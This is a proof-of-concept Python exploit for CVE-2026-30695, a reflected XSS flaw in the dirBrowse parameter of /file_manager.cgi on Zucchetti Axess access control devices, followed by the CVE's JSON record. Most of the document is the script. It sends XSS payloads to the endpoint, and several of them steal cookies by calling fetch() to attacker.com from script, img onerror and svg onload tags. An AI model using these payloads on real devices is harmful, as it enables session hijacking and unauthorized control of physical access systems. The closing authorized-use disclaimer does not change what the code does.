CVE-2026-30695

import requests import urllib.parse # CVE-2026-30695 PoC - Zucchetti Axess XSS in /file_manager.cgi # Target: Zucchetti Axess access control devices (XA4, X3/X3BIO, X4, X7, XIO/i-door/i-door+) TARGET_URL = "http://target-device-ip/file_manager.cgi" # XSS payload to steal cookies xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>' # Alternative XSS payloads xss_payloads = [ '<script>alert(document.cookie)</script>', '<img src=x onerror="fetch(\'https://attacker.com/log?c=\'+document.cookie)">', '<svg onload="fetch(\'https://attacker.com/log?c=\'+document.cookie)">' ] def exploit(target_url, payload): """Send XSS payload via dirBrowse parameter""" params = { 'dirBrowse': payload, 'action': 'browse' # Typical file manager action } try: response = requests.get(target_url, params=params, timeout=10) print(f"[*] Request sent to {target_url}") print(f"[*] Payload: {urllib.parse.unquote(payload)}") print(f"[*] Status: {response.status_code}") if payload in response.text: print("[+] XSS payload reflected in response - vulnerability confirmed!") else: print("[-] Payload not found in response") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") def main(): print("=" * 60) print("CVE-2026-30695 PoC - Zucchetti Axess XSS") print("=" * 60) # Test basic XSS print("\n[*] Testing basic XSS payload...") exploit(TARGET_URL, xss_payloads[0]) # Test alternative payload print("\n[*] Testing img tag XSS payload...") exploit(TARGET_URL, xss_payloads[1]) print("\n[!] Note: This PoC is for authorized security testing only.") print("[!] Ensure you have permission before testing any system.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-30695", "sourceIdentifier": "[email protected]", "published": "2026-03-18T17:16:06.817", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability exists in the web-based configuration interface of Zucchetti Axess access control devices, including XA4, X3/X3BIO, X4, X7, and XIO / i-door / i-door+. The vulnerability is caused by improper sanitization of user-supplied input in the dirBrowse parameter of the /file_manager.cgi endpoint."}, {"lang": "es", "value": "Existe una vulnerabilidad de Cross-Site Scripting (XSS) en la interfaz de configuración basada en web de los dispositivos de control de acceso Zucchetti Axess, incluyendo XA4, X3/X3BIO, X4, X7, y XIO / i-door / i-door+. La vulnerabilidad es causada por la sanitización inadecuada de la entrada proporcionada por el usuario en el parámetro dirBrowse del endpoint /file_manager.cgi."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://firmware.com", "source": "[email protected]"}, {"url": "http://zucchetti.com", "source": "[email protected]"}, {"url": "https://github.com/iremnurylmz/CVE-2026-30695", "source": "[email protected]"}]}}